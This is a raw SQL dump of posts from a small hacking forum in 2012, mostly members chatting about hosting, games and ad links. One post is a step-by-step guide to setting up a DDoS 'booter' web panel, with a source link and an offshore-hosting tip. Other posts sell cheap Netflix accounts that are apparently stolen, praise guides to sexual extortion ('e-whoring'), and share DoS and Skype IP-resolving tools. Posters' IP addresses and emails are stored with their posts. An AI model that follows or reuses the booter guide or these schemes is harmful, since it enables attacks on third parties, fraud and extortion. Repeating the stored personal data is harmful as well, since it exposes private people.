mybb_posts VALUES('673', '81', '191', '12', 'RE: [tut]How to spread your server', '0', '82', 'iTzIpod', '1345750602', 'ROFL. I laughed at this tutorial! <3 Nice tutorial!\n\nUsed it on my Adf.ly link :p \nhttp://adf.ly/C5YAg\n\nMy Referral Link.', '24.212.197.164', '416597412', '1', '0', '82', '1345751512', '1', '036fb9159964e86506e817939154056b', '0', '1345751512'); INSERT INTO mybb_posts VALUES('674', '94', '479', '16', 'RE: What is this section about?', '0', '82', 'iTzIpod', '1345751596', '[quote=\'p420\' pid=\'479\' dateline=\'1345505982\']\r\n[quote=\'sirchamp\' pid=\'457\' dateline=\'1345469119\']\r\nNearly the exact same text on wikipedia. But thanks anyway :D\r\n[/quote]\r\n\r\nGrrrr.. You had to do your research.\r\n[/quote]\r\n\r\nROFL! But oh well. Nice explanation on Social Engineering!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '8c0d2a6ec9193c03e6206deceb37c6e3', '0', '0'); INSERT INTO mybb_posts VALUES('675', '39', '99', '17', 'RE: E-Whoring Pics Pack of 11 girls', '0', '82', 'iTzIpod', '1345751702', 'Nice release! Thanks! <3 I will use it once I master E-Whoring', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '86e8dd7a23c5de47335970750f0d66b6', '0', '0'); INSERT INTO mybb_posts VALUES('676', '26', '79', '17', 'RE: [tut]How to E-Whore, Blackmail with pics and safety tips.', '0', '82', 'iTzIpod', '1345752102', 'I never tried E-Whoring before. :/ I want to try it!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a294ef20b22d398c3f234d0d6a9af697', '0', '0'); INSERT INTO mybb_posts VALUES('677', '193', '0', '59', '150+ Free Hacking eBooks Collection', '0', '82', 'iTzIpod', '1345752929', '150 FREE EBOOKS ABOUT HACKING \r\n\r\n1. HACKING - GENERAL \r\n\r\nCoding+Tut\r\nComputer Virus 4 Dummies\r\nEthical Hacking and Countermeasures\r\nExtreme Tech Hacking Gmail\r\nGoogle_Secrets\r\nGray_Hat_Hacking\r\nHacking Exposed 6th Edition\r\nHacking For Beginners\r\nHacking for Dummies - Kevin Beaver\r\nHacking Secrets Revealed\r\nHow To Hack Hacker Highschool\r\nKevin Mitnick - Ghost in the wires\r\nKevin Mitnick - The Art of Deception\r\nKevin Mitnick - The Art of Intrusion\r\nTelnet Tutorial\r\nThe Ethical Hack\r\nThe Hackers Underground Handbook\r\nWebsite_Hacking_Secrets\r\nWi-fi security \r\n\r\n[url=http://adf.ly/CAFom]Download Click Here [/url]\r\n\r\n2. SQL TUTORIALS \r\n\r\nMastering_MySQL_4.2003.Sybex\r\nMySQL - 2nd Edition (Sams)\r\nMySQL - Essential Skills (2004)\r\nMySQL - Visual QuickStart Guide, 2nd Edition (2006)\r\nMySQL Certification Study Guide (2004)\r\nMySQL Cookbook (2002)\r\nMySQL Cookbook\r\nMySQL Pocket Reference (2003)\r\nMySQL Tutorial (2003)\r\nMySQL.PHP.Database.Applications\r\nSQL - A Beginner\'s Guide, 2nd Edition (2003)\r\nSQL - Practical Guide For Developers (2005)\r\nSQL Bible (2003)\r\nSQL Cookbook (2005)\r\nSQL For Dummies, 6th Edition (2006)\r\nSQL Sams Teach Yourself MySQL in 21 Days -- SAMS\r\nSQL Server 2000 \r\n\r\n[url=http://adf.ly/CAG5U]Download Click Here [/url]\r\n\r\n3. NETWORK SECURITY \r\n\r\nCryptography And Network Security, 4th Edition (2005).chm\r\nDesigning And Implementing Linux Firewalls And QoS (2006)\r\nFirewall Policies And VPN Configurations (2006)\r\nFundamentals of Network Security\r\nLANSecurity\r\nMaximum Computer Security-A Hacker\'s Guide\r\nMcGraw Hill - Hacking Exposed - Network Security, Secrets\r\nNetwork Security Assessment - From Vulnerability To Patch (2006)\r\nNetwork Security Hacks - 100 Industrial-Strength Tips & Tools\r\nNetwork Security With OpenSSL (2002)\r\nSelf-Defending Networks - The Next Generation Of Network Security \r\n\r\n[url=http://adf.ly/CAGGl]Download Click Here [/url]\r\n\r\n4. NETWORK PROGRAMMING \r\n\r\nIllustrated TCP-IP - A Graphic Guide To The Protocol Suite (1999)\r\nPrentice Hall - Internetworking with TCP-IP, Volume I - Principles, Protocols and Architecture\r\nPrentice Hall - Internetworking with TCPIP - Vol 3 Client-Server Programming and Applications for the BSD\r\nSockets Version\r\nTcp Ip For Dummies\r\nTCP-IP Foundations (2004)\r\nTCP-IP Network Administration, 3rd Edition (2002)\r\nTCPIPSettingsinDOS\r\nTCPIP Tools\r\nUnderstanding TCP-IP (2006)\r\nUnix Network Programming - Volume I - The Sockets Networking API, 3rd Edition (2003) \r\n\r\n[url=http://adf.ly/CAGLd]Download Click Here [/url]\r\n\r\n5. UNIX \r\n\r\nA Practical Guide To Linux Commands, Editors, And Shell Programming (2005)\r\nAbsolute BSD - The Ultimate Guide To FreeBSD (2002)\r\nAbsolute OpenBSD - Unix For The Practical Paranoid 2003\r\nEmbedded FreeBSD Cookbook (2002)\r\nGet_Acquainted_with_Linux_Security_and_Optimization_System\r\nHack Proofing Linux - A Guide To Open Source Security (2001)\r\nLearning the UNIX Operating System 4th ed 1998.\r\nLinux Basic Commands\r\nLinux Kernel Development, 2nd Edition\r\nLinux Kernel module programming guide 1\r\nLinux Shell Scripting With Bash (2004)\r\nlinuxKernelSux\r\nLinux_Administration_Made_Easy\r\nLinux_Administrators_Security_Guide\r\nMastering FreeBSD And OpenBSD Security (2005)\r\nMcGraw.Hill.HackNotes.Linux.and.Unix.Security.Portable.Reference.eBook-DDU\r\nOReilly - Linux_Network_Administrator\'s_Guide_Second_Edition\r\nOReilly.Understanding.The Linux Kernel 1st Edition\r\nSam teach you Linux in 24 hours\r\nSecuring Linux A Survival Guide for Linux Security Version 1.0\r\nSecuring Linux Server for Service Providers\r\nSELinux (2004)\r\nshell-scripting\r\nSysAdmin - Security Tools in FreeBSD\r\nTeach Yourself FreeBSD In 24 Hours (2003)\r\nThe Complete FreeBSD, 4th Edition (2003)\r\nThe OpenBSD 4.0 Crash Course (2007)\r\nUnderstanding The Linux Kernel, 3rd Edition (2005)\r\nUnix Power Tools, 3rd Edition (2002).chm\r\nUnix Shell Programming, 3rd Edition (2003) \r\n\r\n[url=http://adf.ly/CAGO4]Download Click Here [/url]\r\n\r\n6. PROGRAMMING \r\n\r\nAdvanced Perl Programming, 2nd Edition (2005)\r\nAssembly Language Step-By-Step - Programming With DOS And Linux, 2nd Edition (2000)\r\nBeginning Linux Programming\r\nBeginning Perl Web Development - From Novice To Professional (2006)\r\nBurtch - Linux Shell Scripting with Bash (2004)\r\nC By Example (1999)\r\nC In A Nutshell (2005).chm\r\nC Primer Plus, 5th Edition (2004)\r\nC-C++ Programmer\'s Reference, 3rd Edition (2003)\r\nCryptography In C And C++ (2001)\r\nEffective C++, 3rd Edition (2005)\r\nGlass,Ables - Linux for Programmers and Users (Prentice, 2006)\r\nGuide To Assembly Language Programming In Linux (2005)\r\nHacker Disassembling Uncovered\r\nIntermediate Perl (2006)\r\nKorn Shell Unix and Linux Programming Manual, 3rd ed 2001\r\nLearning Perl Objects, References, & Modules (2003)\r\nLearning Perl, 4th Edition (2005)\r\nLearning PHP & MySQL (2006)\r\nMatthew - Beginning Linux Programming 4e (Wrox, 2007)\r\nMichael - Mastering UNIX Shell Scripting (Wiley, 2003)\r\nMinimal Perl For UNIX And Linux People (2005)\r\nMitchell - Advanced Linux Programming (New Riders, 2001)\r\nOptimizing C++ (1999)\r\nPerl Best Practices (2005)\r\nPerl Cookbook\r\nPerl Hacks - Tips And Tools For Programming Debugging And Surviving (2006)\r\nPerl Medic - Transforming Legacy Code (2004)\r\nProgramming Embedded Systems In C And C++ (1999)\r\nSecure Programming Cookbook For C And C++ (2003)\r\nWall - Linux Programming Unleashed (SAMS, 1999) \r\n\r\n[url=http://adf.ly/CAGVo]Download Click Here [/url]\r\n\r\n7. EXPLOIT \r\n\r\nExtreme Exploits - Advanced Defenses Against Hardcore Hacks (2005)\r\nHacking - The Art Of Exploitation (2003)\r\nShellcoder\'s Programming Uncovered (2005)\r\nThe Shellcoder\'s Handbook - Discovering And Exploiting Security Holes (2004) \r\n\r\n[url=http://adf.ly/CAGZ3]Download Click Here [/url]\r\n\r\n\r\nCredits: mschauhdry\r\nI take no credit for this.\r\nSorry for the Adf.ly links. I am in need of money. :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a8365a98010c393e56a003b81cc8f6dc', '0', '0'); INSERT INTO mybb_posts VALUES('678', '130', '662', '15', 'RE: Skype IP Finder - FREE', '0', '67', 'HoverCatz', '1345753327', '[quote=\'NXK\' pid=\'662\' dateline=\'1345744483\']\r\nThis is nice, I have my own API like this And iv been thinking about creating one but I guess you got that under control!\r\nNice release.\r\n[/quote]\r\n\r\nWhoops, my api is down :| Looks like you are the next Creator :)', '85.165.36.95', '1436886111', '1', '0', '0', '0', '1', 'daaebc7f389b40ae0826ce5c4d155fb6', '0', '0'); INSERT INTO mybb_posts VALUES('679', '190', '665', '56', 'RE: Copy and paste game', '0', '67', 'HoverCatz', '1345753553', 'http://l33thacking.com/showthread.php?tid=130\n\n:)', '85.165.36.95', '1436886111', '1', '0', '0', '0', '1', '4b16a88bfc8e3478c0c09d256c9bb6c9', '0', '0'); INSERT INTO mybb_posts VALUES('680', '130', '325', '15', 'RE: Skype IP Finder - FREE', '0', '82', 'iTzIpod', '1345753707', 'Seems nice! I will download. And post results.\n[hr]\nEDIT: I got this message on my first attempt! :/ \nError: Index was outside the bounds of the array.', '24.212.197.164', '416597412', '1', '0', '82', '1345754004', '1', '0abbf34300b08ae173cd6c80876b0789', '0', '1345754004'); INSERT INTO mybb_posts VALUES('681', '194', '0', '16', 'So i got this from redbull.', '0', '90', 'duhuh', '1345757587', '[code]Thank you for contacting us and for bringing your experience to our attention. \n\nI would like to take this opportunity to assure you that this type of occurrence is extremely rare at Red Bull and we take all complaints very seriously.\n\nUnfortunately without the can in question it would be impossible for us to ascertain exactly what has happened on this occasion, so we would appreciate it if you would let us know the following information:\n\n- Proof of Purchase\n- Which product did you buy (in which sized can?)\n- Where was the can purchased from?\n- When did you buy it?\n- What was the use by date?\n- What were the time and production codes? (Found on the bottom of our cans and is 7 digits long)[/code]\n\nso i didn\'t think i needed this stuff, can i just fake it all? does it matter?', '86.182.139.218', '1454803930', '0', '0', '90', '1345757600', '1', '6551bc02ff1dfaca6a9f93f679ad6efb', '0', '1345757600'); INSERT INTO mybb_posts VALUES('682', '193', '677', '59', 'RE: 150+ Free Hacking eBooks Collection', '0', '90', 'duhuh', '1345757719', '[quote=\'iTzIpod\' pid=\'677\' dateline=\'1345752929\']\r\nSorry for the Adf.ly links. I am in need of money. :/\r\n[/quote]\r\n\r\nyou not going to make much money from this :P', '86.182.139.218', '1454803930', '0', '0', '0', '0', '1', '8b7404cd6d8077f63737bb16194af841', '0', '0'); INSERT INTO mybb_posts VALUES('683', '184', '671', '35', 'RE: [Video] I\'m a video editor!', '0', '61', 'NXK', '1345757794', '[quote=\'iTzIpod\' pid=\'671\' dateline=\'1345749808\']\r\n[quote=\'NXK\' pid=\'660\' dateline=\'1345738559\']\r\n[quote=\'iTzIpod\' pid=\'657\' dateline=\'1345730483\']\r\nIt\'s alright. Also, if I ever got a video I need edited, I will come to you. =]\r\n\r\n\r\nWhat game is this?\r\n\r\nAlso, what system? PS3, Xbox 360, PC?\r\n[/quote]\r\n\r\nIt\'s counter strike source for PC\r\n[/quote]\r\n\r\n\r\n\r\nOh. Do you have a HDPVR with a Xbox 360 or Ps3 with CoD Games? :p\r\n[/quote]\r\n\r\n\r\nNo I do not. The only footage I edit of console games is pre recorded.', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', 'efa2cb8a7685364403d32727450b4a46', '0', '0'); INSERT INTO mybb_posts VALUES('684', '187', '640', '3', 'RE: Public Downloads?', '0', '1', 't3h jok3r', '1345758374', 'I actually agree with R?????zo? and iTzIpod. We currently need activity and need some bumps on good giveaways and tutorials as well.', '41.174.53.220', '699282908', '1', '0', '0', '0', '1', '14eaab6ae476d5abf48953a51491ea3f', '0', '0'); INSERT INTO mybb_posts VALUES('685', '189', '652', '49', 'RE: Webmaster Section', '0', '1', 't3h jok3r', '1345758526', 'You want to turn LH into HF. I can\'t afford that to happen, because L33THacking is another site and HF is another site with more of whitehat stuff. As said earlier, I will add a webmaster and gaming section BUT after we get more members because I can\'t let that section die like the coding and almost the graphics section is dying. I added the marketplace upon a users request and it\'s not even being used.\nMore sections will be added when we get more members to participate in those sections.\n\nLeaving this suggestion open for further discussion.', '41.174.53.220', '699282908', '1', '0', '0', '0', '1', '96eb77465433ffcc6784b6756927d565', '0', '0'); INSERT INTO mybb_posts VALUES('686', '190', '665', '56', 'RE: Copy and paste game', '0', '1', 't3h jok3r', '1345758826', 'R?????zo? \n\nI copied that when I was answering a suggestion thread.', '41.174.53.220', '699282908', '1', '0', '0', '0', '1', '4db0944992846b3db5349d712792f923', '0', '0'); INSERT INTO mybb_posts VALUES('687', '192', '667', '49', 'RE: [Suggestion] Forum Games Section', '0', '1', 't3h jok3r', '1345758882', 'Nice Suggestion, Also it would be a great idea for people that are bored can post on there and it will increase our activity as well.', '41.174.53.220', '699282908', '1', '0', '0', '0', '1', '7f5ff5825add71d30980595b09f40193', '0', '0'); INSERT INTO mybb_posts VALUES('688', '195', '0', '39', '[Selling] Cheap Netflix Accounts', '0', '82', 'iTzIpod', '1345759118', '[img]http://i.imgur.com/qyaZT.png[/img]\n\n\n\n\n\n\n\n\n\n\nHey LH,\n\niTzIpod here with Netflix Accounts for sale.\n\nI am selling each Netflix Account for 75 cents.\n\nI currently have 50+ in stock. But I am planning on getting more.\n\nIn the meantime, add my Skype for further discussion.\n\n\n- iTzIpod\n\n[b]These accounts have a 1 month guarantee and also, I do not accept Beli.\nAlso, these accounts will work anywhere in North America\nI give 24 hour refunds after purchase. If the accounts don\'t work, I will either give you a refund, or a new account.[/b]\n\n\nContact Info:\nSkype:\n[Spoiler] \niTzIpod\n[/Spoiler]\nMSN/Email:\n[Spoiler]\niTzIpod@hotmail.com\n[/Spoiler]\n\n\n\nVouches: \n[Spoiler]\nNone! :(\nTotal: 0\n[/Spoiler]\n\n\n\nAccounts Sold:\n[Spoiler]\nNone! :(\n[/Spoiler]\n\n\nI might make a Thread Design for this.', '24.212.197.164', '416597412', '1', '0', '82', '1345916425', '1', '4221e2369977824175197058c04689ba', '0', '1345916425'); INSERT INTO mybb_posts VALUES('689', '171', '602', '8', 'RE: What Genre do you listen to?', '0', '1', 't3h jok3r', '1345764660', '[quote=\'iTzIpod\' pid=\'602\' dateline=\'1345596178\']\r\n[quote=\'t3h jok3r\' pid=\'589\' dateline=\'1345594547\']\r\nI have no idea either, I guess hip hop is when it contains break dance because not all rap songs contain break dance.\r\n[/quote]\r\n\r\nYou\'re right about the rap part. I just noticed that :p\r\n\r\nI will find it very hard for someone to Breakdance to Drake :p\r\n[/quote]\r\n\r\nI also noticed it yesterday LOL.', '41.174.53.220', '699282908', '1', '0', '0', '0', '1', '60c3d11d73c2949fd369d2a51c6863a6', '0', '0'); INSERT INTO mybb_posts VALUES('690', '192', '687', '49', 'RE: [Suggestion] Forum Games Section', '0', '82', 'iTzIpod', '1345765244', '[quote=\'t3h jok3r\' pid=\'687\' dateline=\'1345758882\']\r\nNice Suggestion, Also it would be a great idea for people that are bored can post on there and it will increase our activity as well.\r\n[/quote]\r\n\r\nI agree with you there. But then one day you will have a member with 1000+ posts spamming his/her heart out and then be LQ and all. \r\n+ Their posts will make 50% of the forum\'s activity.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '114e0c02ca85c82f4da422c1105370c8', '0', '0'); INSERT INTO mybb_posts VALUES('691', '192', '667', '49', 'RE: [Suggestion] Forum Games Section', '0', '61', 'NXK', '1345765315', 'Are you implying I made my thread to boost my post count?', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', 'bbf747fd55b0d383b54e9589cb0ab565', '0', '0'); INSERT INTO mybb_posts VALUES('692', '193', '682', '59', 'RE: 150+ Free Hacking eBooks Collection', '0', '82', 'iTzIpod', '1345765352', '[quote=\'duhuh\' pid=\'682\' dateline=\'1345757719\']\r\n[quote=\'iTzIpod\' pid=\'677\' dateline=\'1345752929\']\r\nSorry for the Adf.ly links. I am in need of money. :/\r\n[/quote]\r\n\r\nyou not going to make much money from this :P\r\n[/quote]\r\n\r\nIt\'s worth a try. I\'m in need of money. \r\n\r\nVery desperate.. zD', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '27793f95a3fcf977ea50eacee5865793', '0', '0'); INSERT INTO mybb_posts VALUES('693', '196', '0', '3', 'IMPORTANT ANNOUNCEMENT!!!', '0', '1', 't3h jok3r', '1345765632', 'Tomorrow, I will migrating to a new host. I will do a backup before the migration. This thread is just a heads up, just in case something goes wrong. I don\'t thing it would, but just in case. \r\n\r\nThe reason is because of the 20 minutes downtime everyday and no activation emails being sent properly.', '41.151.128.202', '697794762', '1', '0', '0', '0', '1', 'ad5272939e8a9316a1ba1361cf2b83ff', '0', '0'); INSERT INTO mybb_posts VALUES('694', '196', '693', '3', 'RE: IMPORTANT ANNOUNCEMENT!!!', '0', '82', 'iTzIpod', '1345766360', 'Oh Thank God. I kept getting the CloudFlare thing saying that the website was offline...\nHopefully that problem will be fixed. \n\nThanks T3H JOK3R! <3\n\n#1 Admin\n\npelease I am number 1 admin.', '24.212.197.164', '416597412', '1', '0', '2', '1345825920', '1', '19956fdd3497a4c5119b7327699ca29f', '0', '1345825920'); INSERT INTO mybb_posts VALUES('696', '197', '0', '56', '/me Thread', '0', '82', 'iTzIpod', '1345766578', 'Hey LH,\r\n\r\nReally easy to play just start your post with:\r\n\r\n[code]\r\n/me\r\n[/code]\r\n\r\nI\'ll start.\r\n\r\n/me is le cool', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0dab2118472e18b5f4ff2b3d45539588', '0', '0'); INSERT INTO mybb_posts VALUES('697', '196', '694', '3', 'RE: IMPORTANT ANNOUNCEMENT!!!', '0', '61', 'NXK', '1345766620', '[quote=\'iTzIpod\' pid=\'694\' dateline=\'1345766360\']\nOh Thank God. I kept getting the CloudFlare thing saying that the website was offline...\nHopefully that problem will be fixed. \n\nThanks T3H JOK3R! <3\n\n#1 Admin\n[/quote]\n\nThis, Iv been barley able to get online. This is good news!', '99.253.65.17', '1677541649', '0', '0', '61', '1345767695', '1', 'f2c560aee6e5611e887cd1c454c4fe92', '0', '1345767695'); INSERT INTO mybb_posts VALUES('698', '196', '693', '3', 'RE: IMPORTANT ANNOUNCEMENT!!!', '0', '82', 'iTzIpod', '1345766825', '@NXK, yeah.. I could barely access the forum at like 10:00 PM - 12:00 AM..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'bad37f10ea142bd5a386b7215138963a', '0', '0'); INSERT INTO mybb_posts VALUES('699', '196', '698', '3', 'RE: IMPORTANT ANNOUNCEMENT!!!', '0', '1', 't3h jok3r', '1345767008', '[quote=\'iTzIpod\' pid=\'698\' dateline=\'1345766825\']\r\n@NXK, yeah.. I could barely access the forum at like 10:00 PM - 12:00 AM..\r\n[/quote]\r\n\r\nNot just that. LH loses members and posts, it\'s frustrating especially for me when I\'m adding something and the server goes down. Plus if Google or any other bot/spider caches a down page, it\'s bad SEO.', '41.150.193.50', '697745714', '1', '0', '0', '0', '1', 'a982708897a7c317d7a5740757480d7d', '0', '0'); INSERT INTO mybb_posts VALUES('700', '197', '696', '56', 'RE: /me Thread', '0', '1', 't3h jok3r', '1345767072', 'T3h Jok3r is an awesome admin :D', '41.150.193.50', '697745714', '1', '0', '0', '0', '1', '48b52a447bdd7f79d721d554505cdfff', '0', '0'); INSERT INTO mybb_posts VALUES('701', '196', '699', '3', 'RE: IMPORTANT ANNOUNCEMENT!!!', '0', '82', 'iTzIpod', '1345767787', '[quote=\'t3h jok3r\' pid=\'699\' dateline=\'1345767008\']\r\n[quote=\'iTzIpod\' pid=\'698\' dateline=\'1345766825\']\r\n@NXK, yeah.. I could barely access the forum at like 10:00 PM - 12:00 AM..\r\n[/quote]\r\n\r\nNot just that. LH loses members and posts, it\'s frustrating especially for me when I\'m adding something and the server goes down. Plus if Google or any other bot/spider caches a down page, it\'s bad SEO.\r\n[/quote]\r\n\r\nTrue. But hopefully this new host migration will have better host than this current one. \r\n\r\nBy the way may I ask which host we are currently using?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '02759e9f8569c025051b4e533a686a15', '0', '0'); INSERT INTO mybb_posts VALUES('702', '197', '700', '56', 'RE: /me Thread', '0', '82', 'iTzIpod', '1345767878', '[quote=\'t3h jok3r\' pid=\'700\' dateline=\'1345767072\']\r\nT3h Jok3r is an awesome admin :D\r\n[/quote]\r\n\r\nRofl you did it wrong.\r\n\r\nYou type /me and then type out a sentence.\r\n\r\nYou don\'t type T3h Jok3r is awesome xD you type /me is awesome.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd9916db699c46e72c958e6d21cd1e071', '0', '0'); INSERT INTO mybb_posts VALUES('703', '196', '701', '3', 'RE: IMPORTANT ANNOUNCEMENT!!!', '0', '1', 't3h jok3r', '1345768309', '[quote=\'iTzIpod\' pid=\'701\' dateline=\'1345767787\']\r\n[quote=\'t3h jok3r\' pid=\'699\' dateline=\'1345767008\']\r\n[quote=\'iTzIpod\' pid=\'698\' dateline=\'1345766825\']\r\n@NXK, yeah.. I could barely access the forum at like 10:00 PM - 12:00 AM..\r\n[/quote]\r\n\r\nNot just that. LH loses members and posts, it\'s frustrating especially for me when I\'m adding something and the server goes down. Plus if Google or any other bot/spider caches a down page, it\'s bad SEO.\r\n[/quote]\r\n\r\nTrue. But hopefully this new host migration will have better host than this current one. \r\n\r\nBy the way may I ask which host we are currently using?\r\n[/quote]\r\n\r\nSorry I can not say what host we are currently on due to some security reasons. But after the migrating I will surely let you know, my hosting I\'m on now is fairly new and kinda cheap but our new host has been out there for 3+ years with good reviews.', '41.150.193.50', '697745714', '1', '0', '0', '0', '1', 'e987c403720c671a581d7df7a8a0cfec', '0', '0'); INSERT INTO mybb_posts VALUES('704', '196', '693', '3', 'RE: IMPORTANT ANNOUNCEMENT!!!', '0', '20', 'JakeUS', '1345768382', 'Thanks for the heads up.', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', '062d49da829adaf7ff9dd0e4406fc755', '0', '0'); INSERT INTO mybb_posts VALUES('705', '175', '579', '42', 'RE: Is Apple really the most valuable company?', '0', '5', 'Timmy', '1345768451', 'Companies go up and down so Apple can be the most valuable company at the moment.', '41.150.193.50', '697745714', '1', '0', '0', '0', '1', '1bd5146e424ebc06c39f7df94c76a3a8', '0', '0'); INSERT INTO mybb_posts VALUES('706', '197', '696', '56', 'RE: /me Thread', '0', '5', 'Timmy', '1345768498', 'Lol Jok3r.\n\n/me is Elite Member! :P\n\n[b]Edited[/b]\n\nWTF? My post got changed automatically to red and put my username.', '41.150.193.50', '697745714', '1', '0', '5', '1345768616', '1', '66c5467ede652dadcbda7f30dbad8929', '0', '1345768616'); INSERT INTO mybb_posts VALUES('707', '196', '693', '3', 'RE: IMPORTANT ANNOUNCEMENT!!!', '0', '5', 'Timmy', '1345768990', 'I also receive the offline sign a lot. Thanks for heads up.', '41.150.193.50', '697745714', '1', '0', '0', '0', '1', 'c2840fcc63e52f314f5b4c4c5eefa862', '0', '0'); INSERT INTO mybb_posts VALUES('708', '191', '666', '15', 'RE: ProDos v1.0', '0', '1', 't3h jok3r', '1345769465', 'Twice? I\'m downloading this shit right now.', '41.150.193.50', '697745714', '1', '0', '0', '0', '1', '07a95f913ade3c2089c6ddc06730e8a4', '0', '0'); INSERT INTO mybb_posts VALUES('709', '197', '696', '56', 'RE: /me Thread', '0', '82', 'iTzIpod', '1345769713', '@Timmy it is like that. =]\n\n/me has le swag required for Swag Award.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '7b3f5b419cf1f21ee25dbf2fb393ed65', '0', '0'); INSERT INTO mybb_posts VALUES('710', '173', '568', '14', 'RE: [TUT] Staying Anonymous', '0', '4', 'Triple H', '1345769858', 'Nice thread, i wish i could rep. i heard hidemyass sucks and i can\'t use hidemyass.', '41.151.163.157', '697803677', '1', '0', '0', '0', '1', 'c9d72c7deecf3958ad6d85d8604584da', '0', '0'); INSERT INTO mybb_posts VALUES('711', '123', '305', '14', 'RE: Top 10 free VPNs', '0', '4', 'Triple H', '1345769909', 'Thanks for the list rom, you have always posted the best tutorials.', '41.151.163.157', '697803677', '1', '0', '0', '0', '1', 'b8c23bf8c586331a739b70fcc3a5f2e6', '0', '0'); INSERT INTO mybb_posts VALUES('712', '143', '372', '21', 'RE: Tiny flood', '0', '4', 'Triple H', '1345770206', 'I like the GUI. \n\nAll self made programs are simple but very useful.', '41.151.163.157', '697803677', '1', '0', '0', '0', '1', '3e8834259d7b101f26901611d4f3a3ff', '0', '0'); INSERT INTO mybb_posts VALUES('713', '198', '0', '21', '[Tutorial] Setting up your own web Booter[Source Included]', '0', '4', 'Triple H', '1345770454', '[size=medium][align=center]How to Setup your own Client Booter[/align][/size]\r\n[size=xx-small][align=center]Step by Step![/align][/size]\r\n\r\n\r\nSource Code Download: http://uppit.com/j6h89tqegdt8/Prodigys_Booter_SRC_Release.rar\r\n\r\n\r\n[size=medium][u]\r\nHow to Setup Your Host[/u][/size]\r\n[size=medium][u]DO NOT USE 000WEBHOST, YOU NEED A OFFSHORE HOST[/u][/size]\r\n\r\n\r\n1) Please Sign-Up at 000Webhost.\r\n2) Please Click on \"Create New\" and make a new website.\r\n[img]http://vvcap.net/db/6KPPuGYwz9I91r1FoXrP.png[/img]\r\n3) Fill in the information, with the Booter domain you want.\r\n[img]http://vvcap.net/db/B0hbS4Wa2RWz9rPSSp5D.png[/img]\r\n4) You will now get the following Message.\r\n[img]http://vvcap.net/db/zwr9ogi3AQ-4MFXfNKaV.png[/img]\r\n5) Now, go to your cPanel, and scroll down to where it says \"SQL\"\r\n[img]http://vvcap.net/db/W7tg2oIJTYV5O1jiqvo-.png[/img]\r\n6) Click onto SQL.\r\n7) Create a SQL database, and[color=#FF0000][u] SAVE THE INFORMATION[/u][/color]\r\n[img]http://vvcap.net/db/1eGcUQyvl1AJzgmd-7fc.png[/img]\r\n\r\n\r\n\r\n[size=medium][u]Step One[/u][/size]\r\n\r\n1) Setup Your Webhost.\r\n2) Setup your SQL Database.\r\n3) Get your Webhost Information Ready.\r\n4) Get your SQL Information Ready.\r\n\r\n[size=medium][u]Step Two[/u][/size]\r\n\r\n[u]Your FTP Information can be found by going to the \"Files\" section, and click \"View FTP details\"[/u]\r\n[img]http://vvcap.net/db/iHKssvjYq99cRPz0j3tX.png[/img]\r\n\r\n1) Upload all your files to your FTP.\r\n\r\n2) Go to the \"dbc.php\"\r\n3) Download it to your Desktop, and open with Notepad++ \r\n[img]http://vvcap.net/db/JbxJX1w-krsxBahHNGjZ.png[/img]\r\n\r\n4) Look for the Following Information\r\n[code]\r\n\r\ndefine (\"DB_HOST\", \"YOURSQLHOST\"); // set database host\r\ndefine (\"DB_USER\", \"YOURSQLUSER\"); // set database user\r\ndefine (\"DB_PASS\",\"PASSWORD\"); // set database password\r\ndefine (\"DB_NAME\",\"DBNAME\"); // set database name\r\n\r\n[/code]\r\n\r\n5) Replace all the Information, Like your Database Host,Username.Password and name.\r\n\r\n6) Go to your PHPMYADMIN, and click \"import\" on the top, then in the Web-Files folder of the booter, select the \"dbprepare.sql\" file, and load it into the SQL.\r\n\r\n\r\n\r\n[size=medium][u]Step Three[/u][/size]\r\n\r\n1) Your Website and Booter is now live!\r\n2) Go to Your Website, www.YourWebsite.com/login.php <----\r\n3) Please make sure to add the /login.php \r\n4) Click on \"Register\" , and make a account.\r\n\r\n\r\n[size=medium][u]Step Four[/u][/size]\r\n\r\n5) Go to your SQL.\r\n6) Go to your PHPMYADMIN.\r\n7) Go onto the table that your Booter is on.\r\n8) Find the account\'s Table.\r\n9) Find your Account.\r\n10) Change Your Activation Level from \"0\" to \"1\"\r\n11) Change Your User Level from \"1\" to \"5\"\r\n\r\nDone!\r\n\r\n\r\nYou have now successfully setup your own booter!, to add shells please \r\ngo to the \"Add Shell page\".', '41.151.163.157', '697803677', '1', '0', '0', '0', '1', 'c846da643bf2a0bfdb7b1b762e7e9acc', '0', '0'); INSERT INTO mybb_posts VALUES('714', '199', '0', '25', '[Guide]How to protect your identity[Well-detailed]', '0', '4', 'Triple H', '1345770762', 'I will not guarantee 100% assurance that if you follow my tips, you will be entirely untraceable, but your percentage will increase dramatically. \r\n\r\n\r\nThe information I will provide might make you paranoid by the time you are done reading this, so if you don\'t want to be informed and paranoid, please don\'t read this. \r\n\r\n[color=#00BFFF][size=large]I will be covering:[/size][/color]\r\n[color=#FFA500][size=medium]\r\n1) History - Hackers\r\n2) Website owners\r\n3) Your name\r\n4) Your e-mail\r\n5) What you sign up to\r\n6) Information you expose unknowingly \r\n7) Keeping you safe[/size][/color]\r\n\r\n[color=#FFA500]You hear it on the news, you read it on the newspaper, you live with it everywhere without even acknowledging its existence. \r\n\r\n\"Hackers have stolen identities\" I have heard that line so many times this year, it is ridiculous. \r\n\r\nCompanies promising to \"defend\" your identity, memberships giving their words to keep your information to themselves only, the government reassuring that they will only have access.\r\n\r\nAll this[size=medium] is a lie [/size]as information ALWAYS gets leaked or there is an inside worker providing information out into the black market. \r\n[/color] Not only that, but securities on big companies are always exposed and hackers always find their way in.\r\n\r\n[color=#00BFFF][size=x-large]1) History - Hackers[/size][/color]\r\n\r\n[color=#FFD700][b]I will explain briefly on the type of hackers that there are out there for the sake of academical knowledge. These descriptions are not in dept, instead they are meant to slightly touch the subject and educate those are who are unaware of these titles on the cyber world. \r\n\r\n1) Black Hat 